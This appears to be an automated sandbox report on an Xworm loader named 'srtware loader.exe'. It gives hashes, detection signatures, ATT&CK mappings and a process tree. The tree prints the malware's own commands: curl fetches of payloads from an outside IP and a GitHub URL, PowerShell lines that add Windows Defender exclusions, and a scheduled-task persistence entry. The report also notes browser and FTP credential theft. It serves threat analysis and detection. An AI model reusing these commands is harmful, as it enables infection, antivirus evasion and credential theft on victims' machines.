Analysis
-
max time kernel
146s -
max time network
148s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
21-11-2024 17:14
Static task
static1
Behavioral task
behavioral1
Sample
srtware loader.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
srtware loader.exe
Resource
win10v2004-20241007-en
General
-
Target
srtware loader.exe
-
Size
1.1MB
-
MD5
12395d08dc0bfe12e63605328ddd982f
-
SHA1
51ceb544e3900fb85fe7aada564d081219464d1d
-
SHA256
789473143f4f1465f0221fca36ac25f48cae1223f51c9d6219544b27879ec3a6
-
SHA512
1a26d4de93abf8f5af0b7e6ac3307f6cc6c3ce5b905545788430460c1664efa5637c856db3e994163147e259385da3125d6ff13a39bbade962c95872ea5bd4e4
-
SSDEEP
24576:vTc28b2Yf2eSf1xZ9a9wwz+NzYbiaCoWTXKjvFQxf:bcbb2UCrZ9wwwKJL2jvFQx
Malware Config
Signatures
-
Detect Xworm Payload 2 IoCs
resource yara_rule behavioral2/memory/2980-72-0x0000000000E80000-0x0000000001232000-memory.dmp family_xworm behavioral2/memory/2980-73-0x0000000000E80000-0x0000000001232000-memory.dmp family_xworm -
Xworm family
-
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 1100 powershell.exe 2964 powershell.exe 3092 powershell.exe 2844 powershell.exe 4900 powershell.exe -
Downloads MZ/PE file
-
.NET Reactor proctector 6 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource yara_rule behavioral2/memory/5016-2-0x00000000003E0000-0x0000000000772000-memory.dmp net_reactor behavioral2/memory/3720-61-0x0000000000BB0000-0x0000000000F7E000-memory.dmp net_reactor behavioral2/memory/3720-67-0x0000000000BB0000-0x0000000000F7E000-memory.dmp net_reactor behavioral2/memory/2980-72-0x0000000000E80000-0x0000000001232000-memory.dmp net_reactor behavioral2/memory/2980-73-0x0000000000E80000-0x0000000001232000-memory.dmp net_reactor behavioral2/memory/2980-137-0x0000000000E80000-0x0000000001232000-memory.dmp net_reactor -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Control Panel\International\Geo\Nation qqq.scr -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winnotify.lnk qqq.scr File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winnotify.lnk qqq.scr -
Executes dropped EXE 2 IoCs
pid Process 3720 fff.scr 2980 qqq.scr -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\winnotify = "C:\\Users\\Public\\winnotify.scr" qqq.scr -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 24 raw.githubusercontent.com 25 raw.githubusercontent.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 30 IoCs
pid Process 5016 srtware loader.exe 5016 srtware loader.exe 3720 fff.scr 5016 srtware loader.exe 3720 fff.scr 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr 5016 srtware loader.exe 2980 qqq.scr -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language fff.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language qqq.scr Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language srtware loader.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language curl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1588 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
pid Process 1100 powershell.exe 1100 powershell.exe 3720 fff.scr 2964 powershell.exe 2964 powershell.exe 3092 powershell.exe 3092 powershell.exe 2844 powershell.exe 2844 powershell.exe 4900 powershell.exe 4900 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 1100 powershell.exe Token: SeDebugPrivilege 3720 fff.scr Token: SeDebugPrivilege 2980 qqq.scr Token: SeDebugPrivilege 2964 powershell.exe Token: SeDebugPrivilege 3092 powershell.exe Token: SeDebugPrivilege 2844 powershell.exe Token: SeDebugPrivilege 4900 powershell.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 5016 srtware loader.exe 3720 fff.scr 2980 qqq.scr -
Suspicious use of WriteProcessMemory 39 IoCs
description pid Process procid_target PID 5016 wrote to memory of 1100 5016 srtware loader.exe 91 PID 5016 wrote to memory of 1100 5016 srtware loader.exe 91 PID 5016 wrote to memory of 1100 5016 srtware loader.exe 91 PID 5016 wrote to memory of 5084 5016 srtware loader.exe 99 PID 5016 wrote to memory of 5084 5016 srtware loader.exe 99 PID 5016 wrote to memory of 5084 5016 srtware loader.exe 99 PID 5016 wrote to memory of 2960 5016 srtware loader.exe 101 PID 5016 wrote to memory of 2960 5016 srtware loader.exe 101 PID 5016 wrote to memory of 2960 5016 srtware loader.exe 101 PID 5016 wrote to memory of 2920 5016 srtware loader.exe 103 PID 5016 wrote to memory of 2920 5016 srtware loader.exe 103 PID 5016 wrote to memory of 2920 5016 srtware loader.exe 103 PID 5016 wrote to memory of 1840 5016 srtware loader.exe 105 PID 5016 wrote to memory of 1840 5016 srtware loader.exe 105 PID 5016 wrote to memory of 1840 5016 srtware loader.exe 105 PID 5016 wrote to memory of 4492 5016 srtware loader.exe 107 PID 5016 wrote to memory of 4492 5016 srtware loader.exe 107 PID 5016 wrote to memory of 4492 5016 srtware loader.exe 107 PID 5016 wrote to memory of 3720 5016 srtware loader.exe 111 PID 5016 wrote to memory of 3720 5016 srtware loader.exe 111 PID 5016 wrote to memory of 3720 5016 srtware loader.exe 111 PID 5016 wrote to memory of 2980 5016 srtware loader.exe 114 PID 5016 wrote to memory of 2980 5016 srtware loader.exe 114 PID 5016 wrote to memory of 2980 5016 srtware loader.exe 114 PID 2980 wrote to memory of 2964 2980 qqq.scr 115 PID 2980 wrote to memory of 2964 2980 qqq.scr 115 PID 2980 wrote to memory of 2964 2980 qqq.scr 115 PID 2980 wrote to memory of 3092 2980 qqq.scr 117 PID 2980 wrote to memory of 3092 2980 qqq.scr 117 PID 2980 wrote to memory of 3092 2980 qqq.scr 117 PID 2980 wrote to memory of 2844 2980 qqq.scr 121 PID 2980 wrote to memory of 2844 2980 qqq.scr 121 PID 2980 wrote to memory of 2844 2980 qqq.scr 121 PID 2980 wrote to memory of 4900 2980 qqq.scr 124 PID 2980 wrote to memory of 4900 2980 qqq.scr 124 PID 2980 wrote to memory of 4900 2980 qqq.scr 124 PID 2980 wrote to memory of 1588 2980 qqq.scr 126 PID 2980 wrote to memory of 1588 2980 qqq.scr 126 PID 2980 wrote to memory of 1588 2980 qqq.scr 126
Processes
-
C:\Users\Admin\AppData\Local\Temp\srtware loader.exe"C:\Users\Admin\AppData\Local\Temp\srtware loader.exe"1⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -NoProfile -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\Users\'"2⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1100
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c mkdir C:\Users\gbcd2⤵
- System Location Discovery: System Language Discovery
PID:5084
-
-
C:\Windows\SysWOW64\curl.exe"curl.exe" -s http://79.110.49.246/didedba/abc -o C:\Users\gbcd\fff.scr2⤵PID:2960
-
-
C:\Windows\SysWOW64\curl.exe"curl.exe" -s http://79.110.49.246/didedba/dddv -o C:\Users\gbcd\qqq.scr2⤵PID:2920
-
-
C:\Windows\SysWOW64\curl.exe"curl.exe" -s http://79.110.49.246/didedba/write -o C:\Users\gbcd\ddd.scr2⤵PID:1840
-
-
C:\Windows\SysWOW64\curl.exe"curl.exe" -s https://raw.githubusercontent.com/huuuuggga/aaaaa1/refs/heads/main/srtware.exe -o C:\Users\gbcd\srtware.exe2⤵
- System Location Discovery: System Language Discovery
PID:4492
-
-
C:\Users\gbcd\fff.scr"C:\Users\gbcd\fff.scr"2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3720
-
-
C:\Users\gbcd\qqq.scr"C:\Users\gbcd\qqq.scr"2⤵
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2980 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\gbcd\qqq.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'qqq.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3092
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Public\winnotify.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'winnotify.scr'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4900
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "winnotify" /tr "C:\Users\Public\winnotify.scr"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1588
-
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
3Credentials In Files
3Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5aab8b826e6cb46244d577836cd4c7701
SHA1e916ab78664e4b5dc702a205be2050b091d128e2
SHA2560658bd81cff42722f501585dedba8ee0e5bab0cf81d386439e27319d5e82d830
SHA51296e32034b5a0d9a76e3afc62a24aa3a5a2c991ca2b7dba283f79d2d2f06d4fe69f1a2152a3c64f9e2e357126f1ba7106aa771202de8a9693f0463da5cda32b1d
-
Filesize
18KB
MD5453b7d6d1795564e49447b0f6076ad27
SHA1f28b94c3391309a4ad973ba19906641638d47a98
SHA256f6d86bd198761153960959fd24be3a89e6090b21c1554b1f11c72d2d521733e9
SHA5123b03d5413d0bae71948230290a35ecaacebb3bb394436c7fcaf94d0a41c2ee08c4976054fdb27cfa18063be8f1315f4f93eeeaadb12550cf407cfbe6a47bed17
-
Filesize
18KB
MD59ff978668ebe1845e1d085c9a5a39e5f
SHA11d8c3e9a0a7434fd5d6a7c521fa2bb59a7f9019f
SHA25684bab961ccb5cd5d1b769f2d6774b14f39ce6e6fd483e02d5f7b328a4c982da9
SHA512bd0cfa92b30a29f6a0cc17c5a946dfcff969479480dbeb5d0ee79f126f789a0a973a605ccc6f97851674aafa3a40f627e505542a8b16d2d3a20f6c83fb41f1d4
-
Filesize
18KB
MD53d10d58a3f71d896fce29c1bcb77cfdf
SHA1c2f6688cbf58418071b8c870335918013d09592a
SHA256255d5816e028d9ecdaad2cec8796b108856f16a5429a5d815ed45ca280c43326
SHA51269b2e205907590c097de0b43c1316d002c7c04f336ab3fe3c81b55f4431fdc23289c7c7ca04ca1aabc1a57b136979258555193a02f8c96366ac098bf07a7d32b
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
1.2MB
MD52a26ee4cbff061962a08e1e1ff21b2a3
SHA15d46e38be7aa3804036aeeea866ea779248620c0
SHA256985b3985ac504754e2eb844272996a6a368e0bd732facdf096e522648d2db10a
SHA512ae6e6273f209b95a6895ad28f208e46857178c80283cbb2d8fcfe30f52c921f36736b718807623cba969960a7ecd5547b9b53750f33a4ed25e4bc40eb15aead2
-
Filesize
1.1MB
MD533300acb6fb3c7effae29a3eb133be2e
SHA15c906423479c8089be9c51ee2a015d6fb634a4b3
SHA256f7b3c2421385d8169d382b108ebb542786bab4a622a73b039dc887e25682c952
SHA51255a6e5253fe7b9df1c0788c34685d3f33289cd29bfa6a0cf99e0671dda0655dd885d0b93912e21eac5f16978cc02c33ff0849be8afffacdcae8f0a64a91049d3